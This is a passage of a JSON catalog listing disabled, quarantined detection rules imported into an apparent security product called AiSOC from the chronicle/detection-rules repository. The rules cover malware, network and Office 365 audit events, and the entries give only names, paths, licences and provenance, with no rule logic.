"rules/_deprecated/soc_prime_rules/ioc_sigma/windows/netwalker_ransomware_detection.yaral" } }, { "id": "chronicle-detection-rules-netwire-rat-detection-via-wscript", "type": "detection", "name": "netwire_rat_detection_via_wscript", "description": "netwire_rat_detection_via_wscript", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/netwire-rat-detection-via-wscript.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "netwire_rat_detection_via_wscript", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/_deprecated/soc_prime_rules/ioc_sigma/process_creation/netwire_rat_detection_via_wscript.yaral" } }, { "id": "chronicle-detection-rules-network-connection-first-seen-in-past-day", "type": "detection", "name": "network_connection_first_seen_in_past_day", "description": "network_connection_first_seen_in_past_day", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/network-connection-first-seen-in-past-day.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "network_connection_first_seen_in_past_day", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/community/threat_intel/network_connection_first_seen_in_past_day.yaral" } }, { "id": "chronicle-detection-rules-network-connection-tor-exit-nodes", "type": "detection", "name": "network_connection_tor_exit_nodes", "description": "network_connection_tor_exit_nodes", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/network-connection-tor-exit-nodes.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "network_connection_tor_exit_nodes", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/_deprecated/suspicious/network_connection_tor_exit_nodes.yaral" } }, { "id": "chronicle-detection-rules-network-http-low-prevalence-domain-access", "type": "detection", "name": "network_http_low_prevalence_domain_access", "description": "network_http_low_prevalence_domain_access", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/network-http-low-prevalence-domain-access.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "network_http_low_prevalence_domain_access", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/community/threat_intel/network_http_low_prevalence_domain_access.yaral" } }, { "id": "chronicle-detection-rules-network-traffic-to-specific-country", "type": "detection", "name": "network_traffic_to_specific_country", "description": "network_traffic_to_specific_country", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/network-traffic-to-specific-country.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "network_traffic_to_specific_country", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/community/network/network_traffic_to_specific_country.yaral" } }, { "id": "chronicle-detection-rules-new-run-key-pointing-to-suspicious-folder", "type": "detection", "name": "new_run_key_pointing_to_suspicious_folder", "description": "new_run_key_pointing_to_suspicious_folder", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/new-run-key-pointing-to-suspicious-folder.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "new_run_key_pointing_to_suspicious_folder", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/_deprecated/soc_prime_rules/threat_hunting/sysmon/new_run_key_pointing_to_suspicious_folder.yaral" } }, { "id": "chronicle-detection-rules-new-user-created-via-net-exe", "type": "detection", "name": "new_user_created_via_net_exe", "description": "new_user_created_via_net_exe", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/new-user-created-via-net-exe.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "new_user_created_via_net_exe", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/community/microsoft/windows/new_user_created_via_net_exe.yaral" } }, { "id": "chronicle-detection-rules-njrat-cc-post-request", "type": "detection", "name": "njrat_cc_post_request", "description": "njrat_cc_post_request", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/njrat-cc-post-request.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "njrat_cc_post_request", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/_deprecated/soc_prime_rules/threat_hunting/proxy/njrat_c_c_post_request.yaral" } }, { "id": "chronicle-detection-rules-njrat-ratbackdoor-proxy", "type": "detection", "name": "njrat_ratbackdoor_proxy", "description": "njrat_ratbackdoor_proxy", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/njrat-ratbackdoor-proxy.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "njrat_ratbackdoor_proxy", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/_deprecated/soc_prime_rules/ioc_sigma/proxy/njrat_rat_backdoor__proxy.yaral" } }, { "id": "chronicle-detection-rules-north-korean-tunneling-tool-electricfish-detection-ar19129a", "type": "detection", "name": "north_korean_tunneling_tool__electricfish_detection_ar19129a", "description": "north_korean_tunneling_tool__electricfish_detection_ar19129a", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/north-korean-tunneling-tool-electricfish-detection-ar19129a.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "north_korean_tunneling_tool__electricfish_detection_ar19129a", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/_deprecated/soc_prime_rules/threat_hunting/sysmon/north_korean_tunneling_tool___electricfish_detection___ar19_129a.yaral" } }, { "id": "chronicle-detection-rules-notepadexe-dll-search-order-hijackingsysmon", "type": "detection", "name": "notepadexe_dll_search_order_hijackingsysmon", "description": "notepadexe_dll_search_order_hijackingsysmon", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/notepadexe-dll-search-order-hijackingsysmon.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "notepadexe_dll_search_order_hijackingsysmon", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/_deprecated/soc_prime_rules/threat_hunting/sysmon/notepad___exe_dll_search_order_hijacking_sysmon.yaral" } }, { "id": "chronicle-detection-rules-o365-add-user-to-admin-role", "type": "detection", "name": "o365_add_user_to_admin_role", "description": "o365_add_user_to_admin_role", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/o365-add-user-to-admin-role.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "o365_add_user_to_admin_role", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/community/microsoft/o365/o365_add_user_to_admin_role.yaral" } }, { "id": "chronicle-detection-rules-o365-admin-login-activity-to-uncommon-mscloud-apps", "type": "detection", "name": "o365_admin_login_activity_to_uncommon_mscloud_apps", "description": "o365_admin_login_activity_to_uncommon_mscloud_apps", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/o365-admin-login-activity-to-uncommon-mscloud-apps.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "o365_admin_login_activity_to_uncommon_mscloud_apps", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/community/microsoft/o365/o365_admin_login_activity_to_uncommon_mscloud_apps.yaral" } }, { "id": "chronicle-detection-rules-o365-adpowershell-app-login-subsequent-activity", "type": "detection", "name": "o365_ADPowerShell_app_login_subsequent_activity", "description": "o365_ADPowerShell_app_login_subsequent_activity", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/o365-adpowershell-app-login-subsequent-activity.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "o365_ADPowerShell_app_login_subsequent_activity", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/community/microsoft/o365/o365_ADPowerShell_app_login_subsequent_activity.yaral" } }, { "id": "chronicle-detection-rules-o365-entra-id-app-modify-permission-change-on-watchlist", "type": "detection", "name": "o365_entra_id_app_modify_permission_change_on_watchlist", "description": "o365_entra_id_app_modify_permission_change_on_watchlist", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/o365-entra-id-app-modify-permission-change-on-watchlist.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "o365_entra_id_app_modify_permission_change_on_watchlist", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/community/microsoft/o365/o365_entra_id_app_modify_permission_change_on_watchlist.yaral" } }, { "id": "chronicle-detection-rules-o365-entra-id-app-permissions-percent-threshold-exceeded", "type": "detection", "name": "o365_entra_id_app_permissions_percent_threshold_exceeded", "description": "o365_entra_id_app_permissions_percent_threshold_exceeded", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/o365-entra-id-app-permissions-percent-threshold-exceeded.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "o365_entra_id_app_permissions_percent_threshold_exceeded", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/community/microsoft/o365/o365_entra_id_app_permissions_percent_threshold_exceeded.yaral" } }, { "id": "chronicle-detection-rules-o365-entra-id-app-permissions-threshold-exceeded", "type": "detection", "name": "o365_entra_id_app_permissions_threshold_exceeded", "description": "o365_entra_id_app_permissions_threshold_exceeded", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/o365-entra-id-app-permissions-threshold-exceeded.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "o365_entra_id_app_permissions_threshold_exceeded", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/community/microsoft/o365/o365_entra_id_app_permissions_threshold_exceeded.yaral" } }, { "id": "chronicle-detection-rules-o365-entra-id-application-creation", "type": "detection", "name": "o365_entra_id_application_creation", "description": "o365_entra_id_application_creation", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/o365-entra-id-application-creation.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "o365_entra_id_application_creation", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/community/microsoft/o365/o365_entra_id_application_creation.yaral" } }, { "id": "chronicle-detection-rules-o365-entra-id-client-secret-add-update-delete-in-app", "type": "detection", "name": "o365_entra_id_client_secret_add_update_delete_in_app", "description": "o365_entra_id_client_secret_add_update_delete_in_app", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/o365-entra-id-client-secret-add-update-delete-in-app.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "o365_entra_id_client_secret_add_update_delete_in_app", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/community/microsoft/o365/o365_entra_id_client_secret_add_update_delete_in_app.yaral" } }, { "id": "chronicle-detection-rules-o365-group-creation-failure", "type": "detection", "name": "o365_group_creation_failure", "description": "o365_group_creation_failure", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/o365-group-creation-failure.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "o365_group_creation_failure", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/community/microsoft/o365/o365_group_creation_failure.yaral" } }, { "id": "chronicle-detection-rules-o365-group-creation-success", "type": "detection", "name": "o365_group_creation_success", "description": "o365_group_creation_success", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/o365-group-creation-success.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "o365_group_creation_success", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/community/microsoft/o365/o365_group_creation_success.yaral" } }, { "id": "chronicle-detection-rules-o365-group-modification-add-member-success", "type": "detection", "name": "o365_group_modification_add_member_success", "description": "o365_group_modification_add_member_success", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/o365-group-modification-add-member-success.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "o365_group_modification_add_member_success", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/community/microsoft/o365/o365_group_modification_add_member_success.yaral" } }, { "id": "chronicle-detection-rules-o365-group-modification-add-member-success-threshold", "type": "detection", "name": "o365_group_modification_add_member_success_threshold", "description": "o365_group_modification_add_member_success_threshold", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/o365-group-modification-add-member-success-threshold.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "o365_group_modification_add_member_success_threshold", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/community/microsoft/o365/o365_group_modification_add_member_success_threshold.yaral" } }, { "id": "chronicle-detection-rules-o365-group-modification-remove-member-success", "type": "detection", "name": "o365_group_modification_remove_member_success", "description": "o365_group_modification_remove_member_success", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/o365-group-modification-remove-member-success.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "o365_group_modification_remove_member_success", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/community/microsoft/o365/o365_group_modification_remove_member_success.yaral" } }, { "id": "chronicle-detection-rules-o365-logging-disabled", "type": "detection", "name": "o365_logging_disabled", "description": "o365_logging_disabled", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/o365-logging-disabled.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "o365_logging_disabled", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/community/microsoft/o365/o365_logging_disabled.yaral" } }, { "id": "chronicle-detection-rules-o365-logging-enabled", "type": "detection", "name": "o365_logging_enabled", "description": "o365_logging_enabled", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/o365-logging-enabled.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "o365_logging_enabled", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/community/microsoft/o365/o365_logging_enabled.yaral" } }, { "id": "chronicle-detection-rules-o365-login-activity-to-azure-ad-powershell-app", "type": "detection", "name": "o365_login_activity_to_azure_ad_powershell_app", "description": "o365_login_activity_to_azure_ad_powershell_app", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/o365-login-activity-to-azure-ad-powershell-app.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "o365_login_activity_to_azure_ad_powershell_app", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/community/microsoft/o365/o365_login_activity_to_azure_ad_powershell_app.yaral" } }, { "id": "chronicle-detection-rules-o365-login-activity-to-uncommon-mscloud-apps", "type": "detection", "name": "o365_login_activity_to_uncommon_mscloud_apps", "description": "o365_login_activity_to_uncommon_mscloud_apps", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/o365-login-activity-to-uncommon-mscloud-apps.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "o365_login_activity_to_uncommon_mscloud_apps", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/community/microsoft/o365/o365_login_activity_to_uncommon_mscloud_apps.yaral" } }, { "id": "chronicle-detection-rules-o365-onedrive-anonymous-file-accessed", "type": "detection", "name": "o365_onedrive_anonymous_file_accessed", "description": "o365_onedrive_anonymous_file_accessed", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/o365-onedrive-anonymous-file-accessed.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "o365_onedrive_anonymous_file_accessed", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/community/microsoft/o365/o365_onedrive_anonymous_file_accessed.yaral" } }, { "id": "chronicle-detection-rules-o365-onedrive-anonymous-filedownload", "type": "detection", "name": "o365_onedrive_anonymous_filedownload", "description": "o365_onedrive_anonymous_filedownload", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/o365-onedrive-anonymous-filedownload.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "o365_onedrive_anonymous_filedownload", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/community/microsoft/o365/o365_onedrive_anonymous_file_download.yaral" } }, { "id": "chronicle-detection-rules-o365-onedrive-anonymous-link-accessed", "type": "detection", "name": "o365_onedrive_anonymous_link_accessed", "description": "o365_onedrive_anonymous_link_accessed", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/o365-onedrive-anonymous-link-accessed.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "o365_onedrive_anonymous_link_accessed", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/community/microsoft/o365/o365_onedrive_anonymous_link_accessed.yaral" } }, { "id": "chronicle-detection-rules-o365-onedrive-anonymous-link-created-updated", "type": "detection", "name": "o365_onedrive_anonymous_link_created_updated", "description": "o365_onedrive_anonymous_link_created_updated", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/o365-onedrive-anonymous-link-created-updated.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "o365_onedrive_anonymous_link_created_updated", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/community/microsoft/o365/o365_onedrive_anonymous_link_created_updated.yaral" } }, { "id": "chronicle-detection-rules-o365-persistent-login-activity-to-azure-adpowershell-app", "type": "detection", "name": "o365_persistent_login_activity_to_azure_ADPowerShell_app", "description": "o365_persistent_login_activity_to_azure_ADPowerShell_app", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/o365-persistent-login-activity-to-azure-adpowershell-app.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "o365_persistent_login_activity_to_azure_ADPowerShell_app", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/community/microsoft/o365/o365_persistent_login_activity_to_azure_ADPowerShell_app.yaral" } }, { "id": "chronicle-detection-rules-o365-recently-created-entra-id-user-assigned-roles", "type": "detection", "name": "o365_recently_created_entra_id_user_assigned_roles", "description": "o365_recently_created_entra_id_user_assigned_roles", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": 